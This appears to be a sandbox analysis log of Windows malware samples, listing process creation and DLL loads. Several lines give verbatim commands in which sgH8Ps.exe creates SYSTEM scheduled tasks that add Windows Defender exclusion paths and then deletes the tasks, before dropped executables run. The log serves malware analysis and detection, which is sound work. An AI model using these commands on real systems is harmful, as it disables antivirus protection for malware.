Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Source: unknown	Process created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Source: unknown	Process created: C:\Program Files (x86)\K5YQV85\6WWeC.exe "C:\Program Files (x86)\K5YQV85\6WWeC.exe"
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Source: unknown	Process created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
Source: unknown	Process created: C:\Program Files (x86)\K5YQV85\6WWeC.exe "C:\Program Files (x86)\K5YQV85\6WWeC.exe"
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\45631.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\45631.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\45631.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 45631.exe

